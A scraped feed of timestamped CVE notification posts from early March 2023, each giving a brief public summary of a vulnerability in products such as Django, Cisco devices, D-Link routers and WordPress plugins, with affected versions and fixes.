🚨 CVE-2023-26510Ghost 5.35.0 allows authorization bypass: contributors can view draft posts of other users, which is arguably inconsistent with a security policy in which a contributor's draft can only be read by editors until published by an editor. NOTE: the vendor's position is that this behavior has no security impact.🎖@cveNotify |
|
| 2023-03-06 00:29:40 |
🚨 CVE-2023-27635debmany in debian-goodies 0.88.1 allows attackers to execute arbitrary shell commands (because of an eval call) via a crafted .deb file. (The path is shown to the user before execution.)🎖@cveNotify |
|
| 2023-03-06 00:29:39 |
🚨 CVE-2023-27641The REPORT (after z but before a) parameter in wa.exe in L-Soft LISTSERV 16.5 before 17 allows an attacker to conduct XSS attacks via a crafted URL.🎖@cveNotify |
|
| 2023-03-06 00:29:38 |
🚨 CVE-2006-10001A vulnerability, which was classified as problematic, was found in Subscribe to Comments Plugin up to 2.0.7. This affects an unknown part of the file subscribe-to-comments.php. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 2.0.8 is able to address this issue. The name of the patch is 9683bdf462fcac2f32b33be98f0b96497fbd1bb6. It is recommended to upgrade the affected component. The identifier VDB-222321 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-06 00:29:37 |
🚨 CVE-2014-125092A vulnerability was found in MaxButtons Plugin up to 1.26.0 and classified as problematic. This issue affects the function maxbuttons_strip_px of the file includes/maxbuttons-button.php. The manipulation of the argument button_id leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 1.26.1 is able to address this issue. The name of the patch is e74564c9e3b7429808e317f4916bd1c26ef0b806. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-222323.🎖@cveNotify |
|
| 2023-03-06 00:29:36 |
🚨 CVE-2023-0734Improper Authorization in GitHub repository wallabag/wallabag prior to 2.5.4.🎖@cveNotify |
|
| 2023-03-05 22:29:38 |
🚨 CVE-2022-4927A vulnerability was found in ualbertalib NEOSDiscovery 1.0.70 and classified as problematic. This issue affects some unknown processing of the file app/views/bookmarks/_refworks.html.erb. The manipulation leads to use of web link to untrusted target with window.opener access. The attack may be initiated remotely. Upgrading to version 1.0.71 is able to address this issue. The name of the patch is abe9f57123e0c278ae190cd7402a623d66c51375. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-222287.🎖@cveNotify |
|
| 2023-03-05 22:29:37 |
🚨 CVE-2023-25719ConnectWise Control before 22.9.10032 (formerly known as ScreenConnect) fails to validate user-supplied parameters such as the Bin/ConnectWiseControl.Client.exe h parameter. This results in reflected data and injection of malicious code into a downloaded executable. The executable can be used to execute malicious queries or as a denial-of-service vector. NOTE: this CVE Record is only about the parameters, such as the h parameter (this CVE Record is not about the separate issue of signed executable files that are supposed to have unique configurations across customers' installations).🎖@cveNotify |
|
| 2023-03-05 22:29:36 |
🚨 CVE-2021-40241xfig 3.2.7 is vulnerable to Buffer Overflow.🎖@cveNotify |
|
| 2023-03-05 19:29:35 |
🚨 CVE-2023-1181Cross-site Scripting (XSS) - Stored in GitHub repository icret/easyimages2.0 prior to 2.6.7.🎖@cveNotify |
|
| 2023-03-05 16:29:37 |
🚨 CVE-2015-10089A vulnerability classified as problematic has been found in flame.js. This affects an unknown part. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The name of the patch is e6c49b5f6179e31a534b7c3264e1d36aa99728ac. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-222291.🎖@cveNotify |
|
| 2023-03-05 12:29:37 |
🚨 CVE-2023-1179A vulnerability, which was classified as problematic, was found in SourceCodester Computer Parts Sales and Inventory System 1.0. Affected is an unknown function of the component Add Supplier Handler. The manipulation of the argument company_name/province/city/phone_number leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-222330 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-05 12:29:36 |
🚨 CVE-2023-1180A vulnerability has been found in SourceCodester Health Center Patient Record Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file hematology_print.php. The manipulation of the argument hem_id leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222331.🎖@cveNotify |
|
| 2023-03-05 06:29:40 |
🚨 CVE-2015-10088A vulnerability, which was classified as critical, was found in ayttm up to 0.5.0.89. This affects the function http_connect in the library libproxy/proxy.c. The manipulation leads to format string. It is possible to initiate the attack remotely. The name of the patch is 40e04680018614a7d2b68566b261b061a0597046. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-222267.🎖@cveNotify |
|
| 2023-03-05 06:29:39 |
🚨 CVE-2023-24580An issue was discovered in the Multipart Request Parser in Django 3.2 before 3.2.18, 4.0 before 4.0.10, and 4.1 before 4.1.7. Passing certain inputs (e.g., an excessive number of parts) to multipart forms could result in too many open files or memory exhaustion, and provided a potential vector for a denial-of-service attack.🎖@cveNotify |
|
| 2023-03-05 06:29:38 |
🚨 CVE-2022-41323In Django 3.2 before 3.2.16, 4.0 before 4.0.8, and 4.1 before 4.1.2, internationalized URLs were subject to a potential denial of service attack via the locale parameter, which is treated as a regular expression.🎖@cveNotify |
|
| 2023-03-05 06:29:37 |
🚨 CVE-2008-10002A vulnerability has been found in cfire24 ajaxlife up to 0.3.2 and classified as problematic. This vulnerability affects unknown code. The manipulation leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 0.3.3 is able to address this issue. The name of the patch is 9fb53b67312fe3f4336e01c1e3e1bedb4be0c1c8. It is recommended to upgrade the affected component. VDB-222286 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-05 06:29:36 |
🚨 CVE-2008-10003A vulnerability was found in iGamingModules flashgames 1.1.0. It has been classified as critical. Affected is an unknown function of the file game.php. The manipulation of the argument lid leads to sql injection. It is possible to launch the attack remotely. The name of the patch is 6e57683704885be32eea2ea614f80c9bb8f012c5. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-222288.🎖@cveNotify |
|
| 2023-03-05 00:29:40 |
🚨 CVE-2014-125091A vulnerability has been found in codepeople cp-polls Plugin 1.0.1 and classified as critical. This vulnerability affects unknown code of the file cp-admin-int-message-list.inc.php. The manipulation of the argument lu leads to sql injection. The attack can be initiated remotely. Upgrading to version 1.0.2 is able to address this issue. The name of the patch is 6d7168cbf12d1c183bacc5cd5678f6f5b0d518d2. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-222268.🎖@cveNotify |
|
| 2023-03-04 21:29:46 |
🚨 CVE-2023-24751libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the mc_chroma function at motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file.🎖@cveNotify |
|
| 2023-03-04 21:29:45 |
🚨 CVE-2023-24754libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the ff_hevc_put_weighted_pred_avg_8_sse function at sse-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file.🎖@cveNotify |
|
| 2023-03-04 21:29:44 |
🚨 CVE-2023-24755libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the put_weighted_pred_8_fallback function at fallback-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file.🎖@cveNotify |
|
| 2023-03-04 21:29:41 |
🚨 CVE-2023-24756libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the ff_hevc_put_unweighted_pred_8_sse function at sse-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file.🎖@cveNotify |
|
| 2023-03-04 21:29:40 |
🚨 CVE-2023-25221Libde265 v1.0.10 was discovered to contain a heap-buffer-overflow vulnerability in the derive_spatial_luma_vector_prediction function in motion.cc.🎖@cveNotify |
|
| 2023-03-04 21:29:39 |
🚨 CVE-2020-36665A vulnerability was found in Artesãos SEOTools up to 0.17.1 and classified as critical. This issue affects the function eachValue of the file TwitterCards.php. The manipulation of the argument value leads to open redirect. Upgrading to version 0.17.2 is able to address this issue. The name of the patch is ca27cd0edf917e0bc805227013859b8b5a1f01fb. It is recommended to upgrade the affected component. The identifier VDB-222233 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-04 19:29:41 |
🚨 CVE-2020-36664A vulnerability has been found in Artesãos SEOTools up to 0.17.1 and classified as problematic. This vulnerability affects the function setTitle of the file SEOMeta.php. The manipulation of the argument title leads to open redirect. Upgrading to version 0.17.2 is able to address this issue. The name of the patch is ca27cd0edf917e0bc805227013859b8b5a1f01fb. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-222232.🎖@cveNotify |
|
| 2023-03-04 18:29:43 |
🚨 CVE-2023-1175Incorrect Calculation of Buffer Size in GitHub repository vim/vim prior to 9.0.1378.🎖@cveNotify |
|
| 2023-03-04 12:29:41 |
🚨 CVE-2020-36663A vulnerability, which was classified as problematic, was found in Artesãos SEOTools up to 0.17.1. This affects the function makeTag of the file OpenGraph.php. The manipulation of the argument value leads to open redirect. Upgrading to version 0.17.2 is able to address this issue. The name of the patch is ca27cd0edf917e0bc805227013859b8b5a1f01fb. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-222231.🎖@cveNotify |
|
| 2023-03-04 07:30:16 |
🚨 CVE-2023-0230The VK All in One Expansion Unit WordPress plugin before 9.86.0.0 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-03-04 07:30:14 |
🚨 CVE-2023-25233Tenda AC500 V2.0.1.9(1307) is vulnerable to Buffer Overflow in function fromRouteStatic via parameters entrys and mitInterface.🎖@cveNotify |
|
| 2023-03-04 07:30:13 |
🚨 CVE-2023-22998In the Linux kernel before 6.0.3, drivers/gpu/drm/virtio/virtgpu_object.c misinterprets the drm_gem_shmem_get_sg_table return value (expects it to be NULL in the error case, whereas it is actually an error pointer).🎖@cveNotify |
|
| 2023-03-04 07:30:12 |
🚨 CVE-2023-27292An open redirect vulnerability exposes OpenCATS to template injection due to improper validation of user-supplied GET parameters.🎖@cveNotify |
|
| 2023-03-04 07:30:11 |
🚨 CVE-2023-27295Cross-site request forgery is facilitated by OpenCATS failure to require CSRF tokens in POST requests. An attacker can exploit this issue by creating a dummy page that executes Javascript in an authenticated user's session when visited.🎖@cveNotify |
|
| 2023-03-04 07:30:10 |
🚨 CVE-2023-25234Tenda AC500 V2.0.1.9(1307) is vulnerable to Buffer Overflow in function fromAddressNat via parameters entrys and mitInterface.🎖@cveNotify |
|
| 2023-03-04 07:30:09 |
🚨 CVE-2023-25231Tenda Router W30E V1.0.1.25(633) is vulnerable to Buffer Overflow in function fromRouteStatic via parameters entrys and mitInterface.🎖@cveNotify |
|
| 2023-03-04 07:30:05 |
🚨 CVE-2023-24128Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepkey2 parameter at /goform/WifiBasicSet.🎖@cveNotify |
|
| 2023-03-04 07:30:04 |
🚨 CVE-2023-24129Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepkey4 parameter at /goform/WifiBasicSet.🎖@cveNotify |
|
| 2023-03-04 07:30:03 |
🚨 CVE-2023-24130Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepkey parameter at /goform/WifiBasicSet.🎖@cveNotify |
|
| 2023-03-04 07:30:02 |
🚨 CVE-2023-24131Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepkey1_5g parameter at /goform/WifiBasicSet.🎖@cveNotify |
|
| 2023-03-04 07:30:01 |
🚨 CVE-2023-24133Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepkey_5g parameter at /goform/WifiBasicSet.🎖@cveNotify |
|
| 2023-03-04 07:29:57 |
🚨 CVE-2023-22767Authenticated command injection vulnerabilities exist in the ArubaOS command line interface. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2023-03-04 07:29:56 |
🚨 CVE-2023-22768Authenticated command injection vulnerabilities exist in the ArubaOS command line interface. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2023-03-04 07:29:55 |
🚨 CVE-2023-22763Authenticated command injection vulnerabilities exist in the ArubaOS command line interface. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2023-03-04 07:29:54 |
🚨 CVE-2023-22764Authenticated command injection vulnerabilities exist in the ArubaOS command line interface. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2023-03-04 07:29:53 |
🚨 CVE-2023-22765Authenticated command injection vulnerabilities exist in the ArubaOS command line interface. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2023-03-04 07:29:48 |
🚨 CVE-2023-22762Authenticated command injection vulnerabilities exist in the ArubaOS command line interface. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2023-03-04 07:29:43 |
🚨 CVE-2023-0331The Correos Oficial WordPress plugin through 1.2.0.2 does not have an authorization check user input validation when generating a file path, allowing unauthenticated attackers to download arbitrary files from the server.🎖@cveNotify |
|
| 2023-03-03 23:29:57 |
🚨 CVE-2023-23313Certain Draytek products are vulnerable to Cross Site Scripting (XSS) via the wlogin.cgi script and user_login.cgi script of the router's web application management portal. This affects Vigor3910, Vigor1000B, Vigor2962 v4.3.2.1; Vigor2865 and Vigor2866 v4.4.1.0; Vigor2927 v4.4.2.2; and Vigor2915, Vigor2765, Vigor2766, Vigor2135 v4.4.2.0; Vigor2763 v4.4.2.1; Vigor2862 and Vigor2926 v3.9.9.0; Vigor2925 v3.9.3; Vigor2952 and Vigor3220 v3.9.7.3; Vigor2133 and Vigor2762 v3.9.6.4; and Vigor2832 v3.9.6.2.🎖@cveNotify |
|
| 2023-03-03 23:29:56 |
🚨 CVE-2023-26488OpenZeppelin Contracts is a library for secure smart contract development. The ERC721Consecutive contract designed for minting NFTs in batches does not update balances when a batch has size 1 and consists of a single token. Subsequent transfers from the receiver of that token may overflow the balance as reported by `balanceOf`. The issue exclusively presents with batches of size 1. The issue has been patched in 4.8.2.🎖@cveNotify |
|
| 2023-03-03 23:29:55 |
🚨 CVE-2023-26492Directus is a real-time API and App dashboard for managing SQL database content. Directus is vulnerable to Server-Side Request Forgery (SSRF) when importing a file from a remote web server (POST to `/files/import`). An attacker can bypass the security controls by performing a DNS rebinding attack and view sensitive data from internal servers or perform a local port scan. An attacker can exploit this vulnerability to access highly sensitive internal server(s) and steal sensitive information. This issue was fixed in version 9.23.0.🎖@cveNotify |
|
| 2023-03-03 23:29:51 |
🚨 CVE-2022-46560D-Link DIR-882 DIR882A1_FW130B06, DIR-878 DIR_878_FW1.30B08 was discovered to contain a stack overflow via the Password parameter in the SetWan2Settings module.🎖@cveNotify |
|
| 2023-03-03 23:29:50 |
🚨 CVE-2022-46562D-Link DIR-882 DIR882A1_FW130B06, DIR-878 DIR_878_FW1.30B08 was discovered to contain a stack overflow via the PSK parameter in the SetQuickVPNSettings module.🎖@cveNotify |
|
| 2023-03-03 23:29:46 |
🚨 CVE-2022-46566D-Link DIR-882 DIR882A1_FW130B06, DIR-878 DIR_878_FW1.30B08 was discovered to contain a stack overflow via the Password parameter in the SetQuickVPNSettings module.🎖@cveNotify |
|
| 2023-03-03 23:29:45 |
🚨 CVE-2022-46569D-Link DIR-882 DIR882A1_FW130B06, DIR-878 DIR_878_FW1.30B08 was discovered to contain a stack overflow via the Key parameter in the SetWLanRadioSecurity module.🎖@cveNotify |
|
| 2023-03-03 23:29:44 |
🚨 CVE-2022-46570D-Link DIR-882 DIR882A1_FW130B06, DIR-878 DIR_878_FW1.30B08 was discovered to contain a stack overflow via the Password parameter in the SetWan3Settings module.🎖@cveNotify |
|
| 2023-03-03 23:29:41 |
🚨 CVE-2022-37130In D-Link DIR-816 A2_v1.10CNB04, DIR-878 DIR_878_FW1.30B08.img a command injection vulnerability occurs in /goform/Diagnosis, after the condition is met, setnum will be spliced into v10 by snprintf, and the system will be executed, resulting in a command injection vulnerability🎖@cveNotify |
|
| 2023-03-03 23:29:40 |
🚨 CVE-2018-20177rdesktop versions up to and including v1.8.3 contain an Integer Overflow that leads to a Heap-Based Buffer Overflow in the function rdp_in_unistr() and results in memory corruption and possibly even a remote code execution.🎖@cveNotify |
|
| 2023-03-03 23:29:39 |
🚨 CVE-2018-11516The vlc_demux_chained_Delete function in input/demux_chained.c in VideoLAN VLC media player 3.0.1 allows remote attackers to cause a denial of service (heap corruption and application crash) or possibly have unspecified other impact via a crafted .swf file.🎖@cveNotify |
|
| 2023-03-03 21:29:43 |
🚨 CVE-2019-13513In Delta Industrial Automation DOPSoft, Version 4.00.06.15 and prior, processing a specially crafted project file may trigger multiple out-of-bounds read vulnerabilities, which may allow information disclosure, remote code execution, or crash of the application.🎖@cveNotify |
|
| 2023-03-03 21:29:42 |
🚨 CVE-2018-2028IBM Maximo Asset Management 7.6 could allow a an authenticated user to replace a target page with a phishing site which could allow the attacker to obtain highly sensitive information. IBM X-Force ID: 155554.🎖@cveNotify |
|
| 2023-03-03 20:30:13 |
🚨 CVE-2022-36537ZK Framework v9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 allows attackers to access sensitive information via a crafted POST request sent to the component AuUploader.🎖@cveNotify |
|
| 2023-03-03 20:30:12 |
🚨 CVE-2022-0480A flaw was found in the filelock_init in fs/locks.c function in the Linux kernel. This issue can lead to host memory exhaustion due to memcg not limiting the number of Portable Operating System Interface (POSIX) file locks.🎖@cveNotify |
|
| 2023-03-03 20:30:11 |
🚨 CVE-2022-41322In Kitty before 0.26.2, insufficient validation in the desktop notification escape sequence can lead to arbitrary code execution. The user must display attacker-controlled content in the terminal, then click on a notification popup.🎖@cveNotify |
|
| 2023-03-03 20:30:10 |
🚨 CVE-2009-1956Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input.🎖@cveNotify |
|
| 2023-03-03 20:30:09 |
🚨 CVE-2020-18693Cross Site Scripting (XSS) in MineWebCMS v1.7.0 allows remote attackers to execute arbitrary code by injecting malicious code into the 'Title' field of the component '/admin/news'.🎖@cveNotify |
|
| 2023-03-03 20:30:05 |
🚨 CVE-2019-13111A WebPImage::decodeChunks integer overflow in Exiv2 through 0.27.1 allows an attacker to cause a denial of service (large heap allocation followed by a very long running loop) via a crafted WEBP image file.🎖@cveNotify |
|
| 2023-03-03 20:30:04 |
🚨 CVE-2019-14347Internal/Views/addUsers.php in Schben Adive 2.0.7 allows remote unprivileged users (editor or developer) to create an administrator account via admin/user/add, as demonstrated by a Python PoC script.🎖@cveNotify |
|
| 2023-03-03 20:30:03 |
🚨 CVE-2020-27784A vulnerability was found in the Linux kernel, where accessing a deallocated instance in printer_ioctl() printer_ioctl() tries to access of a printer_dev instance. However, use-after-free arises because it had been freed by gprinter_free().🎖@cveNotify |
|
| 2023-03-03 20:30:02 |
🚨 CVE-2019-14529OpenEMR before 5.0.2 allows SQL Injection in interface/forms/eye_mag/save.php.🎖@cveNotify |
|
| 2023-03-03 20:30:01 |
🚨 CVE-2019-14524An issue was discovered in Schism Tracker through 20190722. There is a heap-based buffer overflow via a large number of song patterns in fmt_mtm_load_song in fmt/mtm.c, a different vulnerability than CVE-2019-14465.🎖@cveNotify |
|
| 2023-03-03 20:29:57 |
🚨 CVE-2015-7559It was found that the Apache ActiveMQ client before 5.15.5 exposed a remote shutdown command in the ActiveMQConnection class. An attacker logged into a compromised broker could use this flaw to achieve denial of service on a connected client.🎖@cveNotify |
|
| 2023-03-03 20:29:56 |
🚨 CVE-2019-14459nfdump 1.6.17 and earlier is affected by an integer overflow in the function Process_ipfix_template_withdraw in ipfix.c that can be abused in order to crash the process remotely (denial of service).🎖@cveNotify |
|
| 2023-03-03 20:29:55 |
🚨 CVE-2019-15141WriteTIFFImage in coders/tiff.c in ImageMagick 7.0.8-43 Q16 allows attackers to cause a denial-of-service (application crash resulting from a heap-based buffer over-read) via a crafted TIFF image file, related to TIFFRewriteDirectory, TIFFWriteDirectory, TIFFWriteDirectorySec, and TIFFWriteDirectoryTagColormap in tif_dirwrite.c of LibTIFF. NOTE: this occurs because of an incomplete fix for CVE-2019-11597.🎖@cveNotify |
|
| 2023-03-03 20:29:54 |
🚨 CVE-2019-13512Fuji Electric FRENIC Loader 3.5.0.0 and prior is vulnerable to an out-of-bounds read vulnerability, which may allow an attacker to read limited information from the device.🎖@cveNotify |
|
| 2023-03-03 20:29:53 |
🚨 CVE-2019-15108An issue was discovered in WSO2 API Manager 2.6.0 before WSO2-CARBON-PATCH-4.4.0-4457. There is XSS via a crafted filename to the file-upload feature of the event simulator component.🎖@cveNotify |
|
| 2023-03-03 20:29:49 |
🚨 CVE-2019-3417All versions up to V1.1.10P3T18 of ZTE ZXHN F670 product are impacted by command injection vulnerability. Due to insufficient parameter validation check, an authorized user can exploit this vulnerability to take control of user router system.🎖@cveNotify |
|
| 2023-03-03 20:29:48 |
🚨 CVE-2022-48338An issue was discovered in GNU Emacs through 28.2. In ruby-mode.el, the ruby-find-library-file function has a local command injection vulnerability. The ruby-find-library-file function is an interactive function, and bound to C-c C-f. Inside the function, the external command gem is called through shell-command-to-string, but the feature-name parameters are not escaped. Thus, malicious Ruby source files may cause commands to be executed.🎖@cveNotify |
|
| 2023-03-03 20:29:47 |
🚨 CVE-2022-48339An issue was discovered in GNU Emacs through 28.2. htmlfontify.el has a command injection vulnerability. In the hfy-istext-command function, the parameter file and parameter srcdir come from external input, and parameters are not escaped. If a file name or directory name contains shell metacharacters, code may be executed.🎖@cveNotify |
|
| 2023-03-03 20:29:46 |
🚨 CVE-2022-48285loadAsync in JSZip before 3.8.0 allows Directory Traversal via a crafted ZIP archive.🎖@cveNotify |
|
| 2023-03-03 18:29:53 |
🚨 CVE-2022-2837A flaw was found in coreDNS. This flaw allows a malicious user to redirect traffic intended for external top-level domains (TLD) to a pod they control by creating projects and namespaces that match the TLD.🎖@cveNotify |
|
| 2023-03-03 18:29:49 |
🚨 CVE-2022-41862In PostgreSQL, a modified, unauthenticated server can send an unterminated string during the establishment of Kerberos transport encryption. In certain conditions a server can cause a libpq client to over-read and report an error message containing uninitialized bytes.🎖@cveNotify |
|
| 2023-03-03 18:29:48 |
🚨 CVE-2022-4645LibTIFF 4.4.0 has an out-of-bounds read in tiffcp in tools/tiffcp.c:948, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit e8131125.🎖@cveNotify |
|
| 2023-03-03 18:29:47 |
🚨 CVE-2023-20061Multiple vulnerabilities in Cisco Unified Intelligence Center could allow an authenticated, remote attacker to collect sensitive information or perform a server-side request forgery (SSRF) attack on an affected system. Cisco plans to release software updates that address these vulnerabilities. 🎖@cveNotify |
|
| 2023-03-03 18:29:46 |
🚨 CVE-2023-20062Multiple vulnerabilities in Cisco Unified Intelligence Center could allow an authenticated, remote attacker to collect sensitive information or perform a server-side request forgery (SSRF) attack on an affected system. Cisco plans to release software updates that address these vulnerabilities. 🎖@cveNotify |
|
| 2023-03-03 18:29:45 |
🚨 CVE-2023-20069 A vulnerability in the web-based management interface of Cisco Prime Infrastructure and Cisco Evolved Programmable Network (EPN) Manager could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface on an affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by persuading a user of an affected interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit this vulnerability, the attacker would need to have valid credentials to access the web-based management interface of the affected device. 🎖@cveNotify |
|
| 2023-03-03 18:29:41 |
🚨 CVE-2023-20078Multiple vulnerabilities in the web-based management interface of certain Cisco IP Phones could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service (DoS) condition. For more information about these vulnerabilities, see the Details section of this advisory. 🎖@cveNotify |
|
| 2023-03-03 18:29:40 |
🚨 CVE-2023-20079Multiple vulnerabilities in the web-based management interface of certain Cisco IP Phones could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service (DoS) condition. For more information about these vulnerabilities, see the Details section of this advisory. 🎖@cveNotify |
|
| 2023-03-03 18:29:39 |
🚨 CVE-2023-20088 A vulnerability in the nginx configurations that are provided as part of the VPN-less reverse proxy for Cisco Finesse could allow an unauthenticated, remote attacker to create a denial of service (DoS) condition for new and existing users who are connected through a load balancer. This vulnerability is due to improper IP address filtering by the reverse proxy. An attacker could exploit this vulnerability by sending a series of unauthenticated requests to the reverse proxy. A successful exploit could allow the attacker to cause all current traffic and subsequent requests to the reverse proxy through a load balancer to be dropped, resulting in a DoS condition. 🎖@cveNotify |
|
| 2023-03-03 18:29:38 |
🚨 CVE-2023-20104 A vulnerability in the file upload functionality of Cisco Webex App for Web could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending an arbitrary file to a user and persuading that user to browse to a specific URL. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. 🎖@cveNotify |
|
| 2023-03-03 18:29:37 |
🚨 CVE-2023-26604systemd before 247 does not adequately block local privilege escalation for some Sudo configurations, e.g., plausible sudoers files in which the "systemctl status" command may be executed. Specifically, systemd does not set LESSSECURE to 1, and thus other programs may be launched from the less program. This presents a substantial security risk when running systemctl from Sudo, because less executes as root when the terminal size is too small to show the complete systemctl output.🎖@cveNotify |
|
| 2023-03-03 16:30:16 |
🚨 CVE-2020-11077In Puma (RubyGem) before 4.3.5 and 3.12.6, a client could smuggle a request through a proxy, causing the proxy to send a response back to another unknown client. If the proxy uses persistent connections and the client adds another request in via HTTP pipelining, the proxy may mistake it as the first request's body. Puma, however, would see it as two requests, and when processing the second request, send back a response that the proxy does not expect. If the proxy has reused the persistent connection to Puma to send another request for a different client, the second response from the first client will be sent to the second client. This is a similar but different vulnerability from CVE-2020-11076. The problem has been fixed in Puma 3.12.6 and Puma 4.3.5.🎖@cveNotify |
|
| 2023-03-03 16:30:15 |
🚨 CVE-2023-24081Multiple stored cross-site scripting (XSS) vulnerabilities in Redrock Software TutorTrac before v4.2.170210 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the reason and location fields of the visits listing page.🎖@cveNotify |
|
| 2023-03-03 16:30:14 |
🚨 CVE-2020-13388An exploitable vulnerability exists in the configuration-loading functionality of the jw.util package before 2.3 for Python. When loading a configuration with FromString or FromStream with YAML, one can execute arbitrary Python code, resulting in OS command execution, because safe_load is not used.🎖@cveNotify |
|
| 2023-03-03 16:30:12 |
🚨 CVE-2022-24697Kylin's cube designer function has a command injection vulnerability when overwriting system parameters in the configuration overwrites menu. RCE can be implemented by closing the single quotation marks around the parameter value of “-- conf=” to inject any operating system command into the command line parameters. This vulnerability affects Kylin 2 version 2.6.5 and earlier, Kylin 3 version 3.1.2 and earlier, and Kylin 4 version 4.0.1 and earlier.🎖@cveNotify |
|
| 2023-03-03 16:30:10 |
🚨 CVE-2020-28367Code injection in the go command with cgo before Go 1.14.12 and Go 1.15.5 allows arbitrary code execution at build time via malicious gcc flags specified via a #cgo directive.🎖@cveNotify |
|
| 2023-03-03 16:30:09 |
🚨 CVE-2019-16255Ruby through 2.4.7, 2.5.x through 2.5.6, and 2.6.x through 2.6.4 allows code injection if the first argument (aka the "command" argument) to Shell#[] or Shell#test in lib/shell.rb is untrusted data. An attacker can exploit this to call an arbitrary Ruby method.🎖@cveNotify |
|
| 2023-03-03 16:30:07 |
🚨 CVE-2019-14246In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.851, an insecure object reference allows an attacker to discover phpMyAdmin passwords (of any user in /etc/passwd) via an attacker account.🎖@cveNotify |
|
| 2023-03-03 16:30:06 |
🚨 CVE-2019-14245In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.851, an insecure object reference allows an attacker to delete databases (such as oauthv2) from the server via an attacker account.🎖@cveNotify |
|
| 2023-03-03 16:30:05 |
🚨 CVE-2019-18676An issue was discovered in Squid 3.x and 4.x through 4.8. Due to incorrect input validation, there is a heap-based buffer overflow that can result in Denial of Service to all clients using the proxy. Severity is high due to this vulnerability occurring before normal security checks; any remote client that can reach the proxy port can trivially perform the attack via a crafted URI scheme.🎖@cveNotify |
|
| 2023-03-03 16:30:03 |
🚨 CVE-2019-14513Improper bounds checking in Dnsmasq before 2.76 allows an attacker controlled DNS server to send large DNS packets that result in a read operation beyond the buffer allocated for the packet, a different vulnerability than CVE-2017-14491.🎖@cveNotify |
|
| 2023-03-03 16:30:01 |
🚨 CVE-2021-4325A vulnerability, which was classified as problematic, has been found in NHN TOAST UI Chart 4.1.4. This issue affects some unknown processing of the component Legend Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 4.2.0 is able to address this issue. The name of the patch is 1a3f455d17df379e11b501bb5ba1dd1bcc41d63e. It is recommended to upgrade the affected component. The identifier VDB-221501 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-03 16:30:00 |
🚨 CVE-2022-38779An open redirect issue was discovered in Kibana that could lead to a user being redirected to an arbitrary website if they use a maliciously crafted Kibana URL.🎖@cveNotify |
|
| 2023-03-03 16:29:59 |
